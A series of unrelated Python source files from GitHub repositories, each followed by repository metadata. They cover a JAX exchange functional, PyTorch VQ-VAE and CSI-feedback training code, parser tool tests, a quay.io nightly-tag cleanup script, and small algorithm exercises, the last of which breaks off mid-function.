# from XCFun, which is Copyright Ulf Ekström and contributors 2009-2020
# and provided under the Mozilla Public License (v2.0)
# see also:
# - https://github.com/dftlibs/xcfun
# - https://github.com/dftlibs/xcfun/blob/master/LICENSE.md
import jax.numpy as jnp
import jax
import numpy as np
def __b88(a, gaa):
# precompute
c1 = (4.0 / 3.0)
c2 = (-8.0 / 3.0)
c3 = (-3.0 / 4.0) * (6.0 / np.pi) ** (1.0 / 3.0) * 2
d = 0.0042
d2 = d * 2.
d12 = d *12.
# actual compute
log_a = jnp.log(a/2)
na43 = jnp.exp(log_a * c1)
chi2 = gaa / 4* jnp.exp(log_a * c2 )
chi = jnp.exp(jnp.log( chi2 ) / 2 )
b88 = -(d * na43 * chi2) / (1.0 + 6*d * chi * jnp.arcsinh(chi)) *2
slaterx_a = c3 * na43
return slaterx_a + b88
| graphcore-research/pyscf-ipu | pyscf_ipu/exchange_correlation/b88.py | b88.py | py | 999 | python | en | code | 31 | github-code | 36 |
39099180403 | def palindrome(string):
try:
if len(string) == 0:
raise ValueError("We cannot catch a void string")
return string == string[::-1]
except ValueError as ex:
print(ex)
return False
def main():
try:
# print(palindrome(121))
print(palindrome(""))
except TypeError as e:
print(f"Only we can catch strings. Error: {e}. This is bad.")
if __name__ == "__main__":
main() | ArturoCBTyur/Prueba_Nueva | exceptions.py | exceptions.py | py | 452 | python | en | code | 0 | github-code | 36 |
35001315098 | from ipywidgets import Box, HBox, VBox, FloatSlider, FloatProgress, Label, Layout
s1 = FloatSlider(description='Apple', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
s2 = FloatSlider(description='Horse', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
s3 = FloatSlider(description='Flower', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
s4 = FloatSlider(description='Car', min=-5, max=5, step=0.01, value=0, layout=Layout(width='90%'))
p1 = FloatProgress(min=0, max=1, step=0.01, value=0)
p2 = FloatProgress(min=0, max=1, step=0.01, value=0)
p3 = FloatProgress(min=0, max=1, step=0.01, value=0)
p4 = FloatProgress(min=0, max=1, step=0.01, value=0)
l1 = Label(value="0.00")
l2 = Label(value="0.00")
l3 = Label(value="0.00")
l4 = Label(value="0.00")
import numpy as np
values = np.array([0.0, 0.0, 0.0, 0.0])
def softmax(i):
return np.exp(values[i]) / np.sum(np.exp(values))
def set_values():
l1.value = "%.2f" % softmax(0)
l2.value = "%.2f" % softmax(1)
l3.value = "%.2f" % softmax(2)
l4.value = "%.2f" % softmax(3)
p1.value = softmax(0)
p2.value = softmax(1)
p3.value = softmax(2)
p4.value = softmax(3)
def on_value_change(change):
if change.owner == s1:
values[0] = change.new
if change.owner == s2:
values[1] = change.new
if change.owner == s3:
values[2] = change.new
if change.owner == s4:
values[3] = change.new
set_values()
s1.observe(on_value_change, names='value')
s2.observe(on_value_change, names='value')
s3.observe(on_value_change, names='value')
s4.observe(on_value_change, names='value')
def main():
set_values()
left_box = VBox([s1, s2, s3, s4], layout=Layout(width='50%'))
middle_box = VBox([p1, p2, p3, p4])
right_box = VBox([l1, l2, l3, l4])
return HBox([left_box, middle_box, right_box])
if __name__ == "__main__":
main() | CaptainProton42/MNISTFromScratch | media/softmax_widget.py | softmax_widget.py | py | 1,890 | python | en | code | 1 | github-code | 36 |
9195714863 | import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from math import sqrt
def wn_conv1d(*args, **kwargs):
return nn.utils.weight_norm(nn.Conv1d(*args, **kwargs))
def wn_conv_transpose1d(*args, **kwargs):
return nn.utils.weight_norm(nn.ConvTranspose1d(*args, **kwargs))
def wn_linear(*args, **kwargs):
return nn.Linear(*args, **kwargs)
class BaseQuantize(nn.Module):
def embed_code(self, embed_id):
raise NotImplementedError
class Quantize(BaseQuantize):
def __init__(self, dim, n_embed, decay=0.999, eps=1e-5):
super().__init__()
self.dim = dim
self.n_embed = n_embed
self.decay = decay
self.eps = eps
embed = torch.randn(dim, n_embed)
self.register_buffer('embed', embed)
self.register_buffer('cluster_size', torch.zeros(n_embed))
self.register_buffer('embed_avg', embed.clone())
def forward(self, input):
flatten = input.reshape(-1, self.dim)
dist = (
flatten.pow(2).sum(1, keepdim=True)
- 2 * flatten @ self.embed
+ self.embed.pow(2).sum(0, keepdim=True)
)
_, embed_ind = (-dist).max(1)
embed_onehot = F.one_hot(embed_ind, self.n_embed).type(flatten.dtype)
embed_ind = embed_ind.view(*input.shape[:-1])
quantize = self.embed_code(embed_ind)
if self.training:
self.cluster_size.data.mul_(self.decay).add_(
1 - self.decay, embed_onehot.sum(0)
)
embed_sum = flatten.transpose(0, 1) @ embed_onehot
self.embed_avg.data.mul_(self.decay).add_(1 - self.decay, embed_sum)
n = self.cluster_size.sum()
cluster_size = (
(self.cluster_size + self.eps) / (n + self.n_embed * self.eps) * n
)
embed_normalized = self.embed_avg / cluster_size.unsqueeze(0)
self.embed.data.copy_(embed_normalized)
diff = (quantize.detach() - input).pow(2).mean()
quantize = input + (quantize - input).detach()
return quantize, diff, embed_ind
def embed_code(self, embed_id):
return F.embedding(embed_id, self.embed.transpose(0, 1))
class DecomposedQuantize(BaseQuantize):
def __init__(self, length, dim, n_embed, decay=0.999, eps=1e-5):
super().__init__()
self.dim = dim
self.n_embed = n_embed
self.quantizations = nn.ModuleList([Quantize(dim, n_embed, decay, eps) for _ in range(length)])
def forward(self, input):
out = torch.empty_like(input)
diff = None
ids = torch.empty(*input.shape[:-1], dtype=torch.long, device=input.device)
for i in range(input.size(1)):
quant, diff, code = self.quantizations[i](input[:, i])
out[:, i] = quant
ids[:, i] = code
if diff is None:
diff = diff
else:
diff += diff
return out, diff / len(self.quantizations), ids
def embed_code(self, embed_id):
out = torch.empty(*embed_id.size(), self.dim, dtype=torch.float, device=embed_id.device)
for i in range(embed_id.size(1)):
out[:, i] = self.quantizations[i].embed_code(embed_id[:, i])
return out
class SlicedQuantize(nn.Module):
def __init__(self, d_slice, dim, **kwargs):
super().__init__()
self.dim = dim // d_slice
self.quantize = Quantize(dim=self.dim, **kwargs)
self.d_slice = d_slice
def forward(self, input):
shape = input.size()
input = input.reshape(*input.shape[:-2], -1, self.dim)
z, diff, ids = self.quantize(input)
z = z.view(shape)
return z, diff, ids
class CategoricalNoise(nn.Module):
def __init__(self, n_classes, p):
super().__init__()
self.n_classes = n_classes
self.p = p
def forward(self, input):
if self.training:
mask = (torch.rand(input.shape, device=input.device) > self.p).type(input.dtype)
noise = torch.randint_like(input, 0, self.n_classes)
return input * mask + (1 - mask) * noise
else:
return input
class GeometricCategoricalDropout(nn.Module):
def __init__(self, n, q, alpha):
super().__init__()
if not (0 < q < 1):
raise ValueError('q must be a value 0 < ... < 1')
self.a = 1 / (((q ** (n + 1) - 1) / (q - 1)) - 1)
self.n = n
self.q = q
self.alpha = alpha
#
# self.probs = 1 - alpha * (1 - torch.full([n], self.a) * torch.pow(self.q, (torch.arange(n) + 1).type(torch.float)))
# self.m = torch.distributions.Bernoulli(self.probs)
def forward(self, input):
assert input.max() <= self.n
if self.training:
probs = 1 - torch.pow(self.q, input.type(torch.float))
else:
probs = torch.zeros_like(input)
mask = (torch.rand(input.shape, device=input.device) <= probs).type(input.dtype)
return mask
class Noise(nn.Module):
def __init__(self, alpha=0.1):
super().__init__()
self.alpha = alpha
def forward(self, input):
if not self.training:
return input
return input + self.alpha * torch.randn_like(input)
class ResBlock(nn.Module):
def __init__(self, in_channel, channel, kernel_size=3, padding=1, dilation=1):
super().__init__()
self.conv = nn.Sequential(
nn.ELU(),
nn.Conv1d(in_channel, channel, kernel_size=kernel_size, padding=padding, dilation=dilation),
nn.ELU(),
nn.Conv1d(channel, in_channel, kernel_size=1),
)
def forward(self, input):
out = self.conv(input)
out += input
return out
class ChannelWiseLayerNorm(nn.Module):
def __init__(self, channels):
super().__init__()
self.ln = nn.LayerNorm(channels)
def forward(self, input):
shape = input.size()
input = input.view(shape[0], shape[1], -1).transpose(1, 2)
input = self.ln(input)
input = input.transpose(1, 2).view(shape)
return input
class Attention(nn.Module):
def __init__(self, in_dim, key_query_dim, value_dim, n_heads=1, tau=1.0):
super().__init__()
self.query_w = wn_linear(in_dim, key_query_dim)
self.key_w = wn_linear(in_dim, key_query_dim)
self.value_w = wn_linear(in_dim, value_dim)
self.n_heads = n_heads
self.kq_head_dim = key_query_dim // n_heads
self.val_head_dim = value_dim // n_heads
self.tau = tau
def forward(self, query, key):
bs, _, l = query.size()
query_ = query.transpose(1, 2)
key_ = key.transpose(1, 2)
def reshape(x, head_dim):
return x.view(bs, -1, self.n_heads, head_dim).transpose(1, 2)
query = reshape(self.query_w(query_), self.kq_head_dim)
key = reshape(self.key_w(key_), self.kq_head_dim).transpose(2, 3)
value = reshape(self.value_w(key_), self.val_head_dim)
attn = (query @ key) / sqrt(self.kq_head_dim)
attn = attn / self.tau
attn = F.softmax(attn, dim=-1)
out = attn @ value
out = out.transpose(1, 2).reshape(
bs, l, self.n_heads * self.val_head_dim
)
out = out.permute(0, 2, 1)
return out
class EqualizedConv1d(nn.Module):
def __init__(self, c_in, c_out, kernel_size, stride=1, padding=0, bias=True):
super().__init__()
# define the weight and bias if to be used
self.weight = nn.Parameter(nn.init.normal_(
torch.empty(c_out, c_in, *nn.modules.utils._single(kernel_size))
))
self.use_bias = bias
self.stride = stride
self.pad = padding
if self.use_bias:
self.bias = nn.Parameter(torch.FloatTensor(c_out).fill_(0))
fan_in = np.prod(nn.modules.utils._single(kernel_size)) * c_in # value of fan_in
self.scale = np.sqrt(2) / np.sqrt(fan_in)
def forward(self, x):
return F.conv1d(input=x,
weight=self.weight * self.scale, # scale the weight on runtime
bias=self.bias if self.use_bias else None,
stride=self.stride,
padding=self.pad)
class EqualizedConvTranspose1d(nn.Module):
def __init__(self, c_in, c_out, kernel_size, stride=1, padding=0, bias=True):
super().__init__()
self.weight = nn.Parameter(torch.nn.init.normal_(
torch.empty(c_in, c_out, *nn.modules.utils._single(kernel_size))
))
self.use_bias = bias
self.stride = stride
self.pad = padding
if self.use_bias:
self.bias = nn.Parameter(torch.FloatTensor(c_out).fill_(0))
fan_in = c_in # value of fan_in for deconv
self.scale = np.sqrt(2) / np.sqrt(fan_in)
def forward(self, x):
return F.conv_transpose1d(input=x,
weight=self.weight * self.scale, # scale the weight on runtime
bias=self.bias if self.use_bias else None,
stride=self.stride,
padding=self.pad)
class EqualizedLinear(nn.Module):
def __init__(self, c_in, c_out, bias=True):
"""
Linear layer modified for equalized learning rate
"""
from numpy import sqrt
super().__init__()
self.weight = nn.Parameter(torch.nn.init.normal_(
torch.empty(c_out, c_in)
))
self.use_bias = bias
if self.use_bias:
self.bias = nn.Parameter(torch.FloatTensor(c_out).fill_(0))
fan_in = c_in
self.scale = sqrt(2) / sqrt(fan_in)
def forward(self, x):
return F.linear(x, self.weight * self.scale,
self.bias if self.use_bias else None)
if __name__ == '__main__':
n = 4096
do = GeometricCategoricalDropout(n, 0.998, 1.0)
i = 10000
res = torch.zeros(n)
for j in range(i):
sample = torch.randint(0, n, [128])
out = do(sample)
for k, m in enumerate(out):
if m:
res[sample[k]] += 1
res /= i
import numpy as np
import matplotlib.pyplot as plt
plt.plot(np.arange(n), res.numpy())
plt.ylim(bottom=0)
plt.show() | kklemon/text-gan-experiments | legacy/vq_vae_text/vq_vae_text/modules.py | modules.py | py | 10,464 | python | en | code | 0 | github-code | 36 |
958022852 | #!/usr/bin/env python3
"""An Implement of an autoencoder with pytorch.
This is the template code for 2020 NIAC https://naic.pcl.ac.cn/.
The code is based on the sample code with tensorflow for 2020 NIAC and it can only run with GPUS.
Note:
1.This file is used for designing the structure of encoder and decoder.
2.The neural network structure in this model file is CsiNet, more details about CsiNet can be found in [1].
[1] C. Wen, W. Shih and S. Jin, "Deep Learning for Massive MIMO CSI Feedback", in IEEE Wireless Communications Letters, vol. 7, no. 5, pp. 748-751, Oct. 2018, doi: 10.1109/LWC.2018.2818160.
3.The output of the encoder must be the bitstream.
"""
import numpy as np
import h5py
import torch
from transformer import *
from dataloader import *
from loss import *
import os
import torch.nn as nn
import pickle
import random
from copy import deepcopy
from util import *
def save_obj(obj, name ):
with open( name + '.pkl', 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(name ):
with open( name + '.pkl', 'rb') as f:
return pickle.load(f)
# Parameters for training
torch.backends.cudnn.benchmark=True
np.set_printoptions(suppress=True)
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
use_single_gpu = True # select whether using single gpu or multiple gpus
torch.manual_seed(1)
batch_size = 16
epochs = 8000
learning_rate = 1e-3
num_workers = 4
print_freq = 3200 # print frequency (default: 60)
# parameters for data
# feedback_bits = 48 # sim2 = 0.26814688715868884, multi2 = 2.3217122101795313, multi_div_sim_2 = 8.658359732535498
feedback_bits = 48
B = 2
size_packet = 100
NUM_RX = 4
NUM_TX = 32
NUM_DELAY = 32
NUM_SAMPLE_TRAIN = 4000
def norm_data(x, num_sample, num_rx, num_tx, num_delay):
x2 = np.reshape(x, [num_sample, num_rx * num_tx * num_delay * 2])
x_max = np.max(abs(x2), axis=1)
x_max = x_max[:,np.newaxis]
x3 = x2 / x_max / 2.0
y = np.reshape(x3, [num_sample, num_rx, num_tx, num_delay, 2])
return y
# Model construction
model = AutoEncoder(feedback_bits=48, dropout=0.1)
# model.encoder.load_state_dict(torch.load('submit_pt/encoder_2.pth.tar')['state_dict'])
# model.decoder.load_state_dict(torch.load('submit_pt/generator_2.pth.tar')['state_dict'])
if use_single_gpu:
model = model.cuda()
else:
# DataParallel will divide and allocate batch_size to all available GPUs
model = torch.nn.DataParallel(model).cuda()
import scipy.io as scio
criterion = SmiLoss()
optimizer = torch.optim.AdamW(model.parameters(), lr=learning_rate)
"""
scheduler = WarmUpCosineAnnealingLR(optimizer=optimizer,
T_max=epochs * len(train_loader),
T_warmup=epochs//20 * len(train_loader),
eta_min=1e-6)
"""
data_train = h5py.File('data/H2_32T4R.mat', 'r')
data_train = np.transpose(data_train['H2_32T4R'][:])
data_train = data_train[:, :, :, :, np.newaxis]
data_train = np.concatenate([data_train['real'], data_train['imag']], 4) # 500 4 32 32 2
# data_train = np.reshape(data_train, [NUM_SAMPLE_TRAIN, NUM_RX* NUM_TX, NUM_DELAY* 2, 1])
# x_train = norm_data(data_train, NUM_SAMPLE_TRAIN, NUM_RX, NUM_TX, NUM_DELAY)
data_train = data_train.astype(np.float32)
x_train = data_train
x_test = data_train
"""
x_test = x_test[1000:,:,:,:]
"""
x_train_hat = np.transpose(x_train, (0,3,1,2,4)).reshape(-1, 32, 256)
x_train_paterns = np.unique((np.sum(np.abs(x_train_hat), axis=2) != 0).astype(np.float32), axis=0)
# dataLoader for training
train_dataset = DatasetFolder(x_train, data_an=True)
print(train_dataset.__len__())
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=batch_size, shuffle=True, pin_memory=True, num_workers=num_workers)
def random_cutmix(x):
a = x[:,:,:,:16,:]
b = x[:,:,:,16:,:]
idx = [i for i in range(a.size(0))]
random.shuffle(idx)
res = torch.cat([a,b[idx]], dim=3)
return res
def random_mixup(x, num=3):
weight = np.random.randn(num)
weight = weight / np.sum(weight)
res = x * weight[0]
for i in range(1, num):
idx = [i for i in range(x.size(0))]
random.shuffle(idx)
res += x[idx] * weight[i]
return res
best_loss = 100000
"""
scheduler = WarmUpCosineAnnealingLR(optimizer=optimizer,
T_max=epochs * len(train_loader),
T_warmup=epochs//20 * len(train_loader),
eta_min=1e-6)
"""
print('----', len(train_loader))
for epoch in range(epochs):
if epoch == 200:
for param_group in optimizer.param_groups:
param_group['lr'] = learning_rate * 0.1
# model training
model.train()
total_loss = []
for i, x in enumerate(train_loader):
input = x
input = input.cuda()
# compute output
output = model(input)
loss_list = criterion(output, input, epoch=epoch)
loss = sum(loss_list[1:])
total_loss.append([item.detach().cpu().numpy()*input.size(0) for item in loss_list])
optimizer.zero_grad()
loss.backward()
optimizer.step()
if i % print_freq == 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Loss {loss:.6f}\t'.format(
epoch, i, len(train_loader), loss=loss.item()))
# model evaluating
total_loss = np.sum(np.array(total_loss), axis=0) / len(train_dataset)
print('train loss:{}, other loss:{}\t'.format(total_loss[1], total_loss[2]))
model.eval()
total_loss = []
totalNMSE = 0
y_test = []
count = 0
if epoch%1==0:
with torch.no_grad():
for idx in range(int(4000 / size_packet)):
x = np.random.randint(2, size=(size_packet,feedback_bits))
x = torch.from_numpy(x)
x = x.cuda()
"""
B,_,_,_ = x.size()
x_var = torch.mean((x.view(B,126,-1).detach() - 0.5)**2,dim = -1)
x_sort = torch.sort(-x_var,dim = -1)[1] + torch.arange(B).unsqueeze(-1).to(x_var.device)*126
x_sort = x_sort.view(-1)
x = x.view(B*126,128,2)
input = torch.index_select(x, 0, x_sort).view(B,2,126,128)
"""
input = x
output = model.decoder(input) # bx4x32x32x2
output = output.detach().cpu().numpy()
if idx == 0:
output_all = output
else:
output_all = np.concatenate([output_all, output], axis=0)
new_output_all = output_all
real = x_test[:,:,:,:,0] + x_test[:,:,:,:,1]*1j
fake = new_output_all[:,:,:,:,0] + new_output_all[:,:,:,:,1]*1j
sim_1, multi_1, multi_div_sim_1 = K_nearest(real, fake, NUM_RX, NUM_TX, NUM_DELAY, 2)
print('sim:{}, multi:{}, multi_div_sim_1:{}'.format(sim_1, multi_1, multi_div_sim_1))
if multi_div_sim_1 < best_loss:
modelSave2 = './submit_pt/generator_2.pth.tar'
torch.save({'state_dict': model.decoder.state_dict(), }, modelSave2)
modelSave2 = './submit_pt/encoder_2.pth.tar'
torch.save({'state_dict': model.encoder.state_dict(), }, modelSave2)
print("Model saved")
best_loss = multi_div_sim_1
| China-ChallengeHub/oppo_0.71 | trainer2.py | trainer2.py | py | 7,400 | python | en | code | 1 | github-code | 36 |
71599661864 | import io
import unittest
from glop.host import Host
import glop.tool
from .host_fake import FakeHost
# Trivial glop grammar: match any sequence of characters to end-of-input
# and return it re-joined as a single string (i.e. echo the input).
SIMPLE_GRAMMAR = "grammar = anything*:as end -> join('', as) ,"
class ToolTests(unittest.TestCase):
    """End-to-end tests driving the glop command-line tool via a fake host."""
    # Show full (untruncated) diffs when a multi-line assertion fails.
    maxDiff = None
def check_call_and_return_files(self, host, args, files):
orig_wd = None
tmpdir = None
try:
orig_wd = host.getcwd()
tmpdir = host.mkdtemp()
host.chdir(tmpdir)
host.write_text_files(files)
self._call(host, args, returncode=0)
return host.read_text_files(tmpdir)
finally:
if tmpdir:
host.rmtree(tmpdir)
if orig_wd:
host.chdir(orig_wd)
def check_cmd(self, args, stdin=None, files=None,
returncode=None, out=None, err=None, output_files=None,
actual_output_files=None):
host = self._host()
orig_wd = None
tmpdir = None
try:
orig_wd = host.getcwd()
tmpdir = host.mkdtemp()
host.chdir(tmpdir)
if files:
host.write_text_files(files)
rv = self._call(host, args, stdin, returncode, out, err)
actual_ret, actual_out, actual_err = rv
if output_files:
actual_output_files = host.read_text_files(host.getcwd())
finally:
if tmpdir:
host.rmtree(tmpdir)
if orig_wd:
host.chdir(orig_wd)
if output_files:
self._assert_files(output_files, actual_output_files)
return actual_ret, actual_out, actual_err
def _host(self):
return FakeHost()
def _call(self, host, args, stdin=None, returncode=None, out=None,
err=None):
if stdin is not None:
host.stdin.write(str(stdin))
host.stdin.seek(0)
actual_ret = glop.tool.main(host, args)
actual_out = host.stdout.getvalue()
actual_err = host.stderr.getvalue()
if returncode is not None:
self.assertEqual(returncode, actual_ret)
if out is not None:
self.assertEqual(str(out), actual_out)
if err is not None:
self.assertEqual(str(err), actual_err)
return actual_ret, actual_out, actual_err
def _assert_files(self, expected_files, actual_files):
for k, v in actual_files.items():
self.assertEqual(expected_files[k], v)
self.assertEqual(set(actual_files.keys()), set(expected_files.keys()))
def test_bad_command_line_switch(self):
self.check_cmd(['--not-a-switch'], returncode=2)
def test_ctrl_c(self):
host = FakeHost()
def raise_ctrl_c(*_comps):
raise KeyboardInterrupt
host.read_text_file = raise_ctrl_c
host.write_text_file('simple.g', SIMPLE_GRAMMAR)
self._call(host, ['simple.g'], returncode=130,
out='', err='Interrupted, exiting ...\n')
def test_compile_bad_grammar(self):
files = {
'bad.g': 'grammar',
}
self.check_cmd(['-c', 'bad.g'], files=files,
returncode=1, out='', err=None)
def test_files(self):
files = {
'simple.g': SIMPLE_GRAMMAR,
'input.txt': 'hello, world\n',
}
out_files = files.copy()
out_files['output.txt'] = '"hello, world\\n"\n'
self.check_cmd(['-i', 'input.txt', '-o', 'output.txt',
'simple.g'],
files=files, returncode=0, out='', err='',
output_files=out_files)
def test_grammar_file_not_found(self):
self.check_cmd(['missing.g'], returncode=1,
err='Error: no such file: "missing.g"\n')
def test_help(self):
self.check_cmd(['--help'], returncode=0)
def test_input_is_expr(self):
self.check_cmd(['-e', SIMPLE_GRAMMAR], stdin='hello, world\n',
returncode=0)
def test_input_on_stdin(self):
files = {
'simple.g': SIMPLE_GRAMMAR,
}
self.check_cmd(['-i', '-', 'simple.g'], stdin="hello, world\n",
files=files, returncode=0, out='"hello, world\\n"\n',
err='')
def test_main(self):
host = self._host()
files = {
'simple.g': SIMPLE_GRAMMAR,
}
args = ['-c', '--main', 'simple.g']
output_files = self.check_call_and_return_files(host, args, files)
self.assertIn('simple.py', output_files.keys())
self.assertIn("if __name__ == '__main__'",
output_files['simple.py'])
def test_no_grammar(self):
self.check_cmd([], returncode=2)
def test_no_main(self):
host = self._host()
files = {
'simple.g': SIMPLE_GRAMMAR,
}
args = ['-c', 'simple.g']
output_files = self.check_call_and_return_files(host, args, files)
self.assertIn('simple.py', output_files.keys())
self.assertNotIn("if __name__ == '__main__'",
output_files['simple.py'])
def test_interpret_bad_grammar(self):
files = {
'bad.g': 'grammar',
}
self.check_cmd(['bad.g'], files=files,
returncode=1, out='', err=None)
def test_output_flags(self):
self.check_cmd(['-e', 'grammar = -> "ok"'],
returncode=0, out = '"ok"\n')
self.check_cmd(['-e', 'grammar = -> "ok"', '--as-string'],
returncode=0, out = 'ok\n')
self.check_cmd(['-e', 'grammar = -> "ok"', '--as-string',
'--no-appended-newline'],
returncode=0, out = 'ok')
self.check_cmd(['-e', 'grammar = -> ["o", "k"]', '--as-string'],
returncode=0, out = 'ok\n')
def test_pretty_print(self):
files = {
'simple.g': SIMPLE_GRAMMAR,
}
self.check_cmd(['-p', 'simple.g'], files=files,
returncode=0,
out="grammar = anything*:as end -> join('', as)\n")
def test_pretty_print_glop(self):
# This tests pretty-printing of a non-trivial grammar (glop itself)
# in a limited way: it tests that pretty-printing an already
# pretty-printed grammar doesn't change anything.
h = Host()
glop_contents = h.read_text_file(
h.join(h.dirname(h.path_to_host_module()), '..',
'grammars', 'glop.g'))
files = {'glop.g': glop_contents}
host = self._host()
orig_wd = None
tmpdir = None
try:
orig_wd = host.getcwd()
tmpdir = host.mkdtemp()
host.chdir(tmpdir)
if files:
host.write_text_files(files)
ret, _, _ = self._call(host,
['--pretty-print', 'glop.g',
'-o', 'glop2.g'])
self.assertEqual(0, ret)
ret, _, _ = self._call(host,
['--pretty-print', 'glop2.g',
'-o', 'glop3.g'])
self.assertEqual(0, ret)
actual_output_files = host.read_text_files(host.getcwd())
self.assertMultiLineEqual(actual_output_files['glop2.g'],
actual_output_files['glop3.g'])
finally:
if tmpdir:
host.rmtree(tmpdir)
if orig_wd:
host.chdir(orig_wd)
def test_print_ast(self):
self.check_cmd(['-e', 'grammar = "hello"', '--ast'],
returncode=0,
out='[\n'
' "rules",\n'
' [\n'
' [\n'
' "rule",\n'
' "grammar",\n'
' [\n'
' "lit",\n'
' "hello"\n'
' ]\n'
' ]\n'
' ]\n'
']\n')
def test_version(self):
self.check_cmd(['-V'], returncode=0, out=(glop.tool.VERSION + '\n'),
err=None)
self.check_cmd(['--version'], returncode=0, out=(glop.tool.VERSION + '\n'),
err=None)
| dpranke/glop | tests/tool_test.py | tool_test.py | py | 8,564 | python | en | code | 4 | github-code | 36 |
3156449566 | #!/usr/bin/python3
# Script responsible for removing extra tags of nightly images
# QUAY_ACCESS_TOKEN is needed to set as environment variable before executing script
# The access token is used for authentication against the quay api.
import os
import json
import requests
from dateutil.relativedelta import *
from dateutil.easter import *
from dateutil.rrule import *
from dateutil.parser import *
from datetime import *
import argparse
try:
QUAY_ACCESS_TOKEN = os.environ['QUAY_ACCESS_TOKEN']
except KeyError as e:
print("QUAY_ACCESS_TOKEN environment variable is not set. Please, set it before running the script.")
exit('Script exiting....')
REGISTRY = "quay.io"
NAMESPACE = "kiegroup"
IMAGES={"kogito-data-index-nightly","kogito-quarkus-ubi8-nightly",
"kogito-quarkus-jvm-ubi8-nightly","kogito-quarkus-ubi8-s2i-nightly",
"kogito-springboot-ubi8-nightly","kogito-springboot-ubi8-s2i-nightly",
"kogito-jobs-service-nightly","kogito-management-console-nightly",
"kogito-cloud-operator-nightly"
}
def get_image_tags(image):
'''
Get all the available tags for the image
:param image: image name whose tags needs to be fetched
:return: tags: List of a strcut with tagName and lastModified as fields
'''
tags = []
r = requests.get('https://{0}/api/v1/repository/{1}/{2}/tag/?onlyActiveTags=true'.format(REGISTRY,NAMESPACE,image) , headers={'content-type': 'application/json', 'Authorization': 'Bearer ' + QUAY_ACCESS_TOKEN })
image_metadata= json.loads(r.text)
num_tags = len(image_metadata['tags'])
for i in range(num_tags):
tags.append({
"tagName" : image_metadata['tags'][i]['name'],
"lastModified" : parse(image_metadata['tags'][i]['last_modified'])
})
return tags
def delete_image_tags(image, tags):
'''
Deletes the extra image tags from the repository
:param image: Image whose tags needs to be deleted
:param tags: List of struct with `tagName` and `last_modified` as fields for the image that needs to be deleted
'''
if len(tags) == 0:
print("Image {} does not have extra tags that needs to be deleted".format(image))
else:
for tag in tags:
requests.delete('https://{0}/api/v1/repository/{1}/{2}/tag/{3}'.format(REGISTRY,NAMESPACE,image,tag['tagName']) , headers={'content-type': 'application/json', 'Authorization': 'Bearer ' + QUAY_ACCESS_TOKEN })
print("Successfully deleted {} tags for the image {}".format(len(tags),image))
def get_and_delete_old_tags(image,max_tags):
'''
Driver function, calls the `get_image_tags` to get all the available tags for a image
finds the tags that needs to be deleted and then passes them to `delete_image_tags`
:param image: image name whose old tags needs to be deleted
:param max_tags: Number of maximum tags to be kept for the image
'''
all_tags = get_image_tags(image)
all_tags = list(filter(lambda tag: tag["tagName"]!="latest", all_tags)) #Filter out the entry with latest as tagName from the struct list
all_tags.sort(key=lambda tagInfo: tagInfo.get("lastModified")) #sorting in ascending order to get oldest tag on top
delete_tags = []
if (len(all_tags) - max_tags) > 0:
delete_tags = all_tags[:len(all_tags) - max_tags]
delete_image_tags(image,delete_tags)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Removes extra tags from the registry')
parser.add_argument('--max-tags', dest='max_tags', default=50,type=int, help='Defines the maximum number of tags for the image to be available, defaults to 10')
args = parser.parse_args()
for image in IMAGES:
get_and_delete_old_tags(image,args.max_tags)
| kiegroup/kogito-pipelines | tools/clean-nightly-tags.py | clean-nightly-tags.py | py | 3,786 | python | en | code | 2 | github-code | 36 |
22836675271 | n = int(input())
n_list = input()
m = int(input())
m_list = input()
n_list = list(map(int, n_list.split(" ")))
m_list = list(map(int, m_list.split(" ")))
dic = {}
for i in n_list:
if i not in dic:
dic[i] = 1
else:
dic[i] = dic[i]+1
for i in m_list:
if i in dic:
print(dic[i], end=" ")
else:
print(0,end=" ")
| KuBonWhi/Algorithm | Backjoon/BOJ_10816.py | BOJ_10816.py | py | 360 | python | en | code | 0 | github-code | 36 |
25489916263 | import pytest
import pytest_spec.basic as basic
class TestErrors:
def test_zero(parameter_list):
with pytest.raises(ZeroDivisionError) as e:
basic.division_by_zero(1)
assert e.type == ZeroDivisionError
assert e.typename == "ZeroDivisionError"
assert str(e.value) == "division by zero"
# 引数を変えて行うtest
def add(a, b):
if type(a) is not int or type(b) is not int:
raise TypeError
return a + b
@pytest.mark.parametrize("a,b,expected", [(1, 2, 3), (4, 5, 9), (10, 23, 33)])
def test_add(a, b, expected):
assert add(a, b) == expected
# 引数を変えて、いずれも例外を吐くことを確認するtest
@pytest.mark.parametrize("a,b,expected", [("1", 2, 3), (None, 5, 9), (10, [1], 33)])
def test_add_2(a, b, expected):
with pytest.raises(TypeError):
add(a, b)
| atu4403/pytest_spec | tests/basic/test_basic.py | test_basic.py | py | 865 | python | en | code | 0 | github-code | 36 |
42735837127 | # -------------------------------------------------
# [programmers] 큰수 만들기 (그리디)
# 1. 가장 큰 수를 찾음
# 2. 가장 큰수의 왼쪽 중 가장 작은 수 날림
# 3. k의 개수가 남으면 가장 큰수 오른쪽 가장 작은수 날림
# -------------------------------------------------
# def solution(number, k):
# max_value = max(number) # 아스키 코드로 가장 큰 문자열 반환
# # for i in number[::-1]:
# # if i > max_value:
# # max_value = i
# left = []
# right = []
# for i in range(len(number)):
# if max_value == number[i]:
# left, right = list(number[:i]), list(number[i:]) # 큰 수 기준 왼쪽리스트, 오른쪽 리스트 나눔
# break # 첫번째로 큰수만나면 탈출
# while(k):
# if len(left) != 0:
# left.remove(min(left))
# k -= 1
# else:
# # k가 남고 left가 0이면
# right.remove(min(right))
# k -= 1
# answer = "".join(left + right)
# return answer
# print(solution("01010", 3))
# ----------------------------------------------------------------
# 테스트 케이스 2 ~ 10 실패
# 실패요인 : 예제 테스트케이스들만 고려해 알고리즘을 해석
# ----------------------------------------------------------------
def solution(number, k):
answer = [] # stack
for i in number:
if len(answer) == 0:
answer.append(i)
continue
if k>0:
while answer[-1] < i:
answer.pop()
k -= 1
if len(answer) == 0 or k <= 0:
break
answer.append(i)
if k > 0: # "4321" 앞의 숫자가 뒤의 숫자 보다 모두 큰 경우(뒤부터 k개수 삭제)
